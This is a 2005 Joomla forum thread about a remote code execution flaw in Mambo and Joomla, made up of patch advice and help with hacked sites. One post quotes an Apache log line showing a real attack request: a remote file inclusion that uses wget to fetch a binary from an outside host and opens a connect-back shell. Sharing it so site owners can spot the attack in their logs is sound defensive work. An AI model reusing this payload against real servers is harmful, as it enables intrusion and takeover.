Mambo remote code execution (also affects Joomla)

Jick · **Joined:** Fri Aug 12, 2005 10:06 am **Posts:** 327

The most important files are:

joomla/globals.php
joomla/includes/sef.php

But we recommend updating the whole package because off various bug fixes.
More info: http://www.joomla.org/content/view/498/74/

Arno

acepp · **Posted:** Tue Nov 22, 2005 2:29 am

Thanks everyone who worked on the new release.
I will be updating ASAP!

shumisha · **Joined:** Sat Aug 20, 2005 3:15 pm **Posts:** 469

Thanks for reacting quickly and putting together this update in a few days.

OK, I know this is not exactly your business, but I do have several mambo sites, that I will not move to Joomla in the near future for practical reasons. So the question is : if I stick to the fix published on Mamboserver, basically fixing index.php, index2.php, and so on, will that be fairly safe ? Reading this thread I have two concerns :

1 - Case sensitivity, which seems to means that at least using one version of PHP, hackers can go flying through the mambo fix
2 - There is no fix for sef.php. I understand there is no real risk using the Joomla method (updating globals.php), because that will also be used in sef.php, but if globals.php is not fixed, as per mambo guys solution, then the vulnerability still remains ?

In other words, what do you think is the best course of action for a mambo 4.5.2.3 user as of today ?

Can someone shed some light ?

irstudio · **Joined:** Mon Sep 05, 2005 7:45 pm **Posts:** 74

OK,

I am also wondering what to do here
I have 7 sites, all running 4523
-there have been attempts on 4 of them( they remotely executed the command "id" and nothing else)
-one was defaced today( they were able to execute shell commands: ls, cat, wget,rm,mv

i.e. they had remote shell access as user apache
i.e. they could have wiped out all user-uploaded content like photos in /images/stories/galley, , docman documents, etc.

but they didn't!
(they were even kind enough to make backups of everything the changed

So, as a user of 4523 who can't yet upgrade,
I have 2 questions

what exactly do i change in 4523 (i am guessing i should drop in the new globals.php and sef.php)
since this can happen in sef.php, what should i look for in other components, modules that people use? (eg. advanced SEF (are there any known 3rd part packages that are affected?) . I am guessing that if anything else also registers the globals once again, I am not safe unless i do what?

Saka · **Posted:** Mon Nov 28, 2005 4:08 am

Quote:

what exactly do i change in 4523 (i am guessing i should drop in the new globals.php and sef.php)

Preferably use attached globals.php in Mambo as Joomla's one can cause errors in admin functionality on some Mambo versions.

Quote:

since this can happen in sef.php, what should i look for in other components, modules that people use? (eg. advanced SEF (are there any known 3rd part packages that are affected?) . I am guessing that if anything else also registers the globals once again, I am not safe unless i do what?

Even if 3rd party component extracts globals you will be safe as included globals.php will stop the attack before any other file is being processed.

Badger · **Joined:** Fri Aug 19, 2005 8:44 pm **Posts:** 9

For those that haven't seen the 'hack' live, here is a line from my Apache-server log:

Code:

70.147.185.*** - - [28/Nov/2005:06:26:33 +0100] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://195.120.109.***/cmd.gif?&cmd=cd%20/tmp;wget%20217.160.255.***/cback;chmod%20744%20cback;./cback%20213.131.236.***%208080;echo%20YYY;echo|  HTTP/1.1" 404 214

I editted out the last part of the ip.

It gets a nice defacekit from some medical site in Italy.
From the defacekit

Quote:

friesengeist · **Joined:** Sat Sep 10, 2005 10:31 pm **Posts:** 823

Badger wrote:

For those that haven't seen the 'hack' live, here is a line from my Apache-server log:

Code:

***

Badger, you should not post such details on a public forum. This might give skript kiddies some more ideas where to start.

BTW: There are much more easy ways than the one you quoted...

Badger · **Joined:** Fri Aug 19, 2005 8:44 pm **Posts:** 9

The genie was already out of the bottle. See the start of the topic for the concept.

Vimes · **Posted:** Mon Nov 28, 2005 11:04 am

It gives the uneducated among us an idea of what to look for. I'm glad he put it in. At least now I know what the hell I'm looking for in my logs.

kper · **Joined:** Fri Aug 26, 2005 11:09 am **Posts:** 182

Saka wrote:

Preferably use attached globals.php in Mambo as Joomla's one can cause errors in admin functionality on some Mambo versions.

Can this be used on Mambo 4.5.1, Saka?

Is it safe to use SEFAdvance on 4.5.1 (actually 4.5.1.3) in the light of these recent exploits?

Tom · **Posted:** Mon Nov 28, 2005 6:51 pm

It seems that Joomla 1.0.4 is not vulnerable to this attack.

I tried it on my site, I got this error...
Illegal variable _files or _env or _get or _post or _cookie or _server or _session or globals passed to script.

nickpledge · **Posted:** Wed Nov 30, 2005 1:44 pm

I have installed 1.0.4 the day it came out all has been fine up until now!

It seems my site has been hacked, i was seeing several

Quote:

Warning: Cannot modify header information - headers already sent by (output started at /home/knightri/public_html/site/language/english.php:539) in /home/knightri/public_html/site/includes/joomla.php on line 1025

Warning: Cannot modify header information - headers already sent by (output started at /home/knightri/public_html/site/language/english.php:539) in /home/knightri/public_html/site/index.php on line 218

Warning: Cannot modify header information - headers already sent by (output started at /home/knightri/public_html/site/language/english.php:539) in /home/knightri/public_html/site/index.php on line 219

Warning: Cannot modify header information - headers already sent by (output started at /home/knightri/public_html/site/language/english.php:539) in /home/knightri/public_html/site/index.php on line 220

Warning: Cannot modify header information - headers already sent by (output started at /home/knightri/public_html/site/language/english.php:539) in /home/knightri/public_html/site/index.php on line 221

Warning: Cannot modify header information - headers already sent by (output started at /home/knightri/public_html/site/language/english.php:539) in /home/knightri/public_html/site/index.php on line 222

and i was not able to log into my admin panel. From there it then decided to download a wmv movie.. and that was not tasteful! Its still happening now!

http://www.knightrideruk.co.uk

I have no idea what to do from here on please can someone help me?

The URL of the WMV leads to http://server1cuatui.com

nickpledge · **Posted:** Wed Nov 30, 2005 7:44 pm

please anyone?

rjs · **Posted:** Wed Nov 30, 2005 10:18 pm

Bump dev's on the lastest post. Do we have any known vulnerabilites in 1.0.4? Thanks.

Vimes · **Posted:** Wed Nov 30, 2005 11:08 pm

Seconded.

I understand if you've all got your heads buried in code looking for solutions but a quick word to say you're aware of it would help immensley.

Cheers,

Jinx · **Joined:** Fri Aug 12, 2005 12:47 am **Posts:** 6431

There are no know vulnerabilities in 1.0.4. As for the headers already sent out problem.

Delete any extra lines below the php closing tga '?>' int the following files :

1. /includes/joomla.php
2. /languages/english.php

That should solve the headers already sent problems.

nickpledge · **Posted:** Thu Dec 01, 2005 9:08 am

I lost the errors, but i still seem to have this URL linking to this horrid video. I will check out those other files.... failing that i have a full SQL and PHP backup from a while ago.... what do i need to do to reinstate that?

rjs · **Posted:** Thu Dec 01, 2005 1:09 pm

Thanks Jinx.

Saka · **Posted:** Thu Dec 01, 2005 5:17 pm

kper wrote:

Can this be used on Mambo 4.5.1, Saka?

Yes.

kper wrote:

Is it safe to use SEFAdvance on 4.5.1 (actually 4.5.1.3) in the light of these recent exploits?

Be sure to update to latest version (4.2.4). And apply this globals.php and you should be safe.

kper · **Joined:** Fri Aug 26, 2005 11:09 am **Posts:** 182

Thanks. Advice much appreciated.

I presume there is, similarly, no harm in using this globals.php with the code snippet offered by the Mambo people for inclusion in index(x).php files?

Vimes · **Posted:** Fri Dec 02, 2005 12:16 am

Jinx wrote:

There are no know vulnerabilities in 1.0.4.

Thanks for that Jinx.

nickpledge · **Posted:** Mon Dec 05, 2005 9:12 am

Im sorry but i still require some help. When i go to my website after a few secs it directs completely to http://www.coolrip.com/

Why is this happening and where should i be looking to change?

This has gone on for ages now and really want people seeing my website not this http://www.coolrip.com. How could they have got in and directed them away?

http://www.knightrideruk.co.uk

Please can someone help me!

marlyred · **Joined:** Thu Aug 18, 2005 2:23 pm **Posts:** 170

I am not an expert in this area but I think you should check your .htaccess in the root of your Joomla directory. I think it is in this file that the redirect may have been configured.

nickpledge · **Posted:** Mon Dec 05, 2005 10:33 am

My Joomla DIR is called SITE and yes there is a htaccess.txt which contains the following.

Quote:

##
# @version $Id: htaccess.txt 1005 2005-11-13 17:33:59Z stingrey $
# @package Joomla
# @copyright Copyright (C) 2005 Open Source Matters. All rights reserved.
# @license http://www.gnu.org/copyleft/gpl.html GNU/GPL
# Joomla! is Free Software
##

Options +FollowSymLinks

#
# mod_rewrite in use
#

RewriteEngine On

# Uncomment following line if your webserver's URL
# is not directly related to physical file paths.
# Update YourJoomlaDirectory (just / for root)

# RewriteBase /YourJoomlaDirectory

#
# Rules
#

RewriteCond %{REQUEST_FILENAME} !\.(jpg|jpeg|gif|png|css|js|pl|txt)$
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*) index.php

Nothing about coolrip.com

Could some sort of SQL injection have been made so it does this? Man im so confused.

de · **Joined:** Thu Aug 18, 2005 9:06 am **Posts:** 1465

nickpledge wrote:

Im sorry but i still require some help. When i go to my website after a few secs it directs completely to http://www.coolrip.com/

You should just check what JavaScript you have on your page... look at the page source of your site, it reference JavaScript from: domainstat.net/stat.php
(that does the redirect to coolrip)

But now please don't ask "Help, where is it comming from?"... that you need to find out by yourself... look at relevant files... could possibly be the templates index.php (but it is hard to tell by just looking at the page source).

nickpledge · **Posted:** Mon Dec 05, 2005 11:35 am

I asked for "help" as many others or if a few may of had the same issue. Sorry if im out of line... $:-\$

de · **Joined:** Thu Aug 18, 2005 9:06 am **Posts:** 1465

nickpledge wrote:

I asked for "help" as many others or if a few may of had the same issue. Sorry if im out of line... $:-\$

Sorry, I just wanted to mention that in advance... because that was a common question (the where) after telling someone what is wrong (maybe somehow seemingly automatic).
By myself I just think that a separate thread would be better... but that's just me and I wasn't trying to tell that you did anything wrong ;-)

Joomla! Discussion Forums

Forum rules

Mambo remote code execution (also affects Joomla)

Quick reply

Who is online